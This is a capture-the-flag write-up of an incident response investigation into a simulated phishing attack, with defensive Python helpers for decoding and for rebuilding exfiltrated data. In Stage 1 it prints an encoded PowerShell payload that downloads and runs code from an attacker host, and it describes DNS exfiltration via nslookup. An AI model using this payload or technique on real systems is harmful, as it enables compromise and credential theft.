TryHackMe Malware Analysis & Incident Response Medium Apr '26

Boogeyman 1

Investigated a targeted phishing attack against a logistics company's finance team. Traced a malicious LNK file delivered via encrypted ZIP, decoded an obfuscated PowerShell payload, and uncovered credential exfiltration via DNS tunneling using nslookup.

Difficulty: Medium | Completion: 100% | Platform: TryHackMe

Tools used: lnkparse, Wireshark, tshark, KeePass, CyberChef
Stage 1

Q1. What is the email address used to send the phishing email?

let's start with the email header.

email header artifact

the From field tells us where the email came from:

sender field showing agriffin@bpakcaging.xyz
Answer: agriffin@bpakcaging.xyz
Q2. What is the email address of the victim?

the To field in the same header gives the victim's address: julianne.westcott@hotmail.com

Answer: julianne.westcott@hotmail.com
Q3. What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?

the DKIM-Signature header shows this:

DKIM-Signature header

and the List-Unsubscribe header shows this:

List-Unsubscribe header showing elasticemail

both reference elasticemail, so the phish went out through that third-party relay rather than straight from the attacker's own mail server.
Answer: elasticemail
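As an added example (not part of the original write-up), the same three lookups done with Python's standard library instead of eyeballing the headers: sender, recipient, the DKIM d= and s= tags, and every host the List-Unsubscribe header points at. The message below is constructed for the demo; the DKIM tags, selector and unsubscribe URLs are placeholders, not the values from the room's .eml.

```python
# Added example: phishing-header triage with the standard library.
# SAMPLE_EML is constructed for the demo; DKIM tags and unsubscribe URLs
# are placeholders, not the room's real header values.
import email
from email import policy
from urllib.parse import urlparse

SAMPLE_EML = """\
From: agriffin@bpakcaging.xyz
To: julianne.westcott@hotmail.com
Subject: Invoice
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=elasticemail.com;
 s=api; h=From:To:Subject; bh=ZmFrZQ==; b=ZmFrZQ==
List-Unsubscribe: <https://tracking.elasticemail.com/unsubscribe?c=1>,
 <mailto:unsubscribe@elasticemail.com?subject=1>
Content-Type: text/plain

Please find the invoice attached. Password: Invoice2023!
"""


def parse_dkim_tags(value: str) -> dict:
    """Split a DKIM-Signature value into its tag=value pairs (d=, s=, h=, ...)."""
    tags = {}
    for part in value.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip()] = "".join(v.split())  # drop folding whitespace
    return tags


def list_unsubscribe_hosts(value: str) -> list:
    """Return the hosts referenced by List-Unsubscribe, for http(s) and mailto targets."""
    hosts = []
    for chunk in value.split(","):
        target = chunk.strip().strip("<>")
        parsed = urlparse(target)
        if parsed.scheme == "mailto":
            hosts.append(parsed.path.split("?")[0].split("@")[-1].lower())
        elif parsed.hostname:
            hosts.append(parsed.hostname.lower())
    return hosts


def triage(raw_eml: str) -> dict:
    """Pull the fields that answer Stage 1 Q1-Q3 out of a raw message."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    dkim = parse_dkim_tags(str(msg["DKIM-Signature"] or ""))
    return {
        "from": str(msg["From"]),
        "to": str(msg["To"]),
        "dkim_domain": dkim.get("d"),
        "dkim_selector": dkim.get("s"),
        "unsubscribe_hosts": list_unsubscribe_hosts(str(msg["List-Unsubscribe"] or "")),
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_EML).items():
        print(f"{key}: {val}")
```

When the DKIM signing domain and the unsubscribe hosts agree with each other but not with the From domain, the message was relayed by a bulk-mail provider; that is the pattern this question is getting at.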
Q4. What is the name of the file inside the encrypted attachment?

the email body references the attachment:

email body showing encrypted ZIP attachment

ZIP encryption protects the file contents, not the central directory, so the name of the file inside invoice.zip can be listed without knowing the password:

ZIP contents showing Invoice_20230103.lnk
Answer: Invoice_20230103.lnk
Q5. What is the password of the encrypted attachment?

the password is handed to the victim in the email body itself:

email body showing password Invoice2023!
Answer: Invoice2023!
Q6. Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?

lnkparse reads the shortcut and shows the command it runs. the Command Line Arguments field carries a base64 blob handed to PowerShell:

lnkparse output showing command line arguments with base64 payload

the blob is base64 of UTF-16LE text, which is what PowerShell's -EncodedCommand expects, so in CyberChef it takes "From Base64" followed by "Decode text" (UTF-16LE). the decoded command pulls the next stage from files.bpakcaging.xyz:

CyberChef decoding the base64: decoded PowerShell downloading from files.bpakcaging.xyz

the question asks for the encoded payload, so the answer is the base64 string exactly as it appears in the LNK.

Answer: aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
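As an added example (not part of the original write-up), the CyberChef step done in Python: base64-decode the blob, decode the bytes as UTF-16LE, and pull out any URLs the script fetches. It also shows the failure mode you get when a single character is lost while copying the blob out of the lnkparse output: the string is no longer a multiple of four characters and the decode fails instead of silently producing garbage.

```python
# Added example: decode a PowerShell -EncodedCommand blob (base64 of UTF-16LE).
import base64
import binascii
import re

# The payload from Invoice_20230103.lnk (Stage 1 Q6 answer).
LNK_PAYLOAD = (
    "aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4A"
    "YgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA=="
)


def decode_encoded_command(b64: str) -> str:
    """Turn an -EncodedCommand blob back into script text.

    Raises ValueError when the input is not valid base64 or not UTF-16LE,
    which is what a truncated copy of the blob looks like.
    """
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not valid base64: {exc}") from exc
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE, or the blob is truncated")
    return raw.decode("utf-16-le")


def is_intact(b64: str) -> bool:
    """True if the blob decodes cleanly; False if a character was lost in copying."""
    try:
        decode_encoded_command(b64)
        return True
    except ValueError:
        return False


def extract_urls(script: str) -> list:
    """Every http(s) URL in the decoded script, quotes and parentheses stripped."""
    return re.findall(r"https?://[^\s'\"()]+", script)


def analyse(b64: str) -> dict:
    script = decode_encoded_command(b64)
    lowered = script.lower()
    return {
        "script": script,
        "urls": extract_urls(script),
        "downloads": "downloadstring" in lowered or "downloadfile" in lowered,
    }


if __name__ == "__main__":
    result = analyse(LNK_PAYLOAD)
    print(result["script"])
    print("fetches:", result["urls"])
    print("copy intact:", is_intact(LNK_PAYLOAD), "| missing first char:", is_intact(LNK_PAYLOAD[1:]))
```

The `validate=True` flag makes `b64decode` reject stray characters instead of skipping them, so a mangled blob fails loudly; that is the behaviour you want in a triage script rather than a best-effort decode.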
Stage 2

Q1. What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order.

for this stage we have the PowerShell logs from the infected host. let's see what's in them.

PowerShell history logs overview

it's a lot of events. the EventID narrows things down, but sorting by timestamp first shows which commands ran earliest.

the file hosting domain is files.bpakcaging.xyz, since that's where the LNK's decoded command fetched /update from. further down the logs there's traffic to a second host, cdn.bpakcaging.xyz, which is the C2:

log entry showing cdn.bpakcaging.xyz C2 traffic
Answer: cdn.bpakcaging.xyz, files.bpakcaging.xyz
Q2. What is the name of the enumeration tool downloaded by the attacker?

logs showing sb.exe download and Seatbelt string in output

the attacker downloads sb.exe and runs it to collect information about the host and its users.

"Seatbelt" then shows up in its output: sb.exe is a renamed copy of Seatbelt, the GhostPack host enumeration tool.

Answer: Seatbelt
Q3. What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.

from the screenshot in the previous question we know the attacker ran sq3.exe from the Music folder against a file under AppData. tracing back the cd commands that precede it gives the full path:

cd command chain leading to plum.sqlite in Sticky Notes AppData path
Answer: C:\\Users\\j.westcott\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite
Q4. What is the software that uses the file in Q3?

the package name in the path, Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe, identifies plum.sqlite as the Microsoft Sticky Notes database, and sq3.exe (presumably a renamed sqlite3 client) is what the attacker used to read it:

sq3.exe command against plum.sqlite showing Sticky Notes path
Answer: Microsoft Sticky Notes
Q5. What is the name of the exfiltrated file?

reading on past the sq3.exe execution, the logs show the file the attacker staged next:

log showing protected_data.kdbx being staged for exfiltration
Answer: protected_data.kdbx
Q6. What type of file uses the .kdbx file extension?

.kdbx is the KeePass database format, so the attacker went after the user's password vault.

Answer: KeePass
Q7. What is the encoding used during the exfiltration attempt of the sensitive file?

the exfil script stores the destination IP in a variable named $destination. searching the logs for that variable brings up the rest of the script:

$destination variable query result

the file is converted to hex before it is sent:

hex encoding used in exfiltration command
Answer: hex
Q8. What is the tool used for exfiltration?

the same command runs nslookup, so the hex chunks leave the host as DNS queries to the attacker's server rather than as an HTTP upload.

Answer: nslookup
Stage 3

Q1. What software is used by the attacker to host its presumed file/payload server?

the payload was fetched from files.bpakcaging.xyz, so filter the packet capture for that host.

Wireshark filter for files.bpakcaging.xyz

the Server header in the HTTP response gives the software away:

HTTP server banner showing Python
Answer: Python
Q2. What HTTP method is used by the C2 for the output of the commands executed by the attacker?

the C2 host is cdn.bpakcaging.xyz. filtering on it shows that command output is sent back to the C2 in the body of POST requests.

Answer: POST
Q3. What is the protocol used during the exfiltration activity?

the exfiltration ran through nslookup, so everything left the host over DNS.

Answer: DNS
Q4. What is the password of the exfiltrated file?

from stage 2 we know the attacker dumped the Note table out of plum.sqlite with sq3.exe. following the stream that carries that output we get this:

DNS stream showing obfuscated base64 message

the note content comes back encoded. decoding it in CyberChef gives the password that was sitting in the sticky note:

CyberChef decoding output showing %p9^3!lL^Mz47E2GaT^y
Answer: %p9^3!lL^Mz47E2GaT^y
Q5. What is the credit card number stored inside the exfiltrated file?

the hint points at tshark. to keep the output clean, pull only the DNS queries sent during the exfiltration window.

tshark command filtering for DNS exfiltration packets

now we are getting somewhere, but there is still a lot of noise in the output:

tshark output with noise: partial data visible

each query name is one hex chunk of protected_data.kdbx with the attacker's domain appended. stripping the domain, concatenating the chunks in the order they were sent and converting the result from hex rebuilds the .kdbx file. opening it in KeePass with the password from the previous question exposes the stored entry:

KeePass database opened showing credit card 4024007128269551
Answer: 4024007128269551
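As an added example (not part of the original write-up), the reassembly step in Python. It takes the query-name list that `tshark -r capture.pcapng -Y 'dns.flags.response == 0' -T fields -e dns.qry.name` prints, keeps only the names under the attacker's domain whose leading labels are pure hex (which drops cdn. and files. lookups that share the domain), concatenates the chunks in capture order, unhexes them and checks for the KDBX signature before you bother opening the result in KeePass. The label layout (`<hexchunk>.bpakcaging.xyz`) and the sample query list are assumptions constructed for the demo, not copied from the room's capture.

```python
# Added example: rebuild a file exfiltrated one hex chunk per DNS query.
# Label layout and SAMPLE_QUERIES are constructed assumptions for the demo.
import binascii
import re

EXFIL_DOMAIN = "bpakcaging.xyz"
HEX_LABEL = re.compile(r"^[0-9a-f]+$")

# KDBX files start with this 8-byte signature (0x9AA2D903, 0xB54BFB67, little-endian).
KDBX_MAGIC = bytes.fromhex("03d9a29a67fb4bb5")


def extract_chunks(query_names, domain=EXFIL_DOMAIN):
    """Keep queries under the exfil domain whose leading labels are all hex.

    cdn.bpakcaging.xyz and files.bpakcaging.xyz share the domain but fail the
    hex test, so the attacker's other traffic is filtered out here.
    """
    suffix = "." + domain
    chunks = []
    for name in query_names:
        name = name.strip().lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        labels = name[: -len(suffix)].split(".")
        if labels and all(HEX_LABEL.match(lbl) for lbl in labels):
            chunks.append("".join(labels))
    return chunks


def reassemble(query_names, domain=EXFIL_DOMAIN) -> bytes:
    """Concatenate the hex chunks in capture order and decode them."""
    hexdata = "".join(extract_chunks(query_names, domain))
    if len(hexdata) % 2:
        raise ValueError("odd number of hex digits: a chunk is missing or duplicated")
    return binascii.unhexlify(hexdata)


def looks_like_kdbx(data: bytes) -> bool:
    """Sanity check before handing the blob to KeePass."""
    return data.startswith(KDBX_MAGIC)


# Constructed sample: a fake 'kdbx' split into 8-byte chunks, with noise mixed in.
FAKE_KDBX = KDBX_MAGIC + bytes(range(40))
SAMPLE_QUERIES = ["files.bpakcaging.xyz", "cdn.bpakcaging.xyz"]
for i in range(0, len(FAKE_KDBX), 8):
    SAMPLE_QUERIES.append(FAKE_KDBX[i:i + 8].hex() + "." + EXFIL_DOMAIN)
SAMPLE_QUERIES.insert(5, "www.microsoft.com")  # unrelated lookup from the same window
SAMPLE_QUERIES.append("cdn.bpakcaging.xyz")


if __name__ == "__main__":
    blob = reassemble(SAMPLE_QUERIES)
    print(f"{len(blob)} bytes rebuilt, kdbx signature present: {looks_like_kdbx(blob)}")
    with open("protected_data.kdbx", "wb") as fh:  # open this in KeePass with the Q4 password
        fh.write(blob)
```

One caveat from real captures: if the resolver was slow, the client may retransmit a query, and the same chunk then appears twice in the list. The odd-length check above catches some of that, but a duplicated chunk of even length will pass it and corrupt the file, so compare the DNS transaction IDs of suspiciously identical queries before trusting the output.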
Key Takeaways
  • LNK files work because they look like nothing. hiding the password inside the email body is the kind of thing you'd skip right past without thinking twice
  • nslookup doing DNS exfiltration just blends in. you only catch it if you were already watching outbound DNS traffic before it happened
  • Sticky Notes stores data in a SQLite database. not something you'd guess, but now it's on my checklist for any compromised host
  • sometimes you just have to go through the logs line by line after a key binary runs. slow, but that's how i figured out what sq3.exe was actually doing

overall: great room. stage 2 tripped me up for a while because i couldn't figure out what the extracted file actually was. only found it by going through the logs manually after sq3.exe ran, which took longer than i'd like to admit. tshark was also new territory, had to lean on AI to get the query right. solid capstone though. genuinely enjoyed it.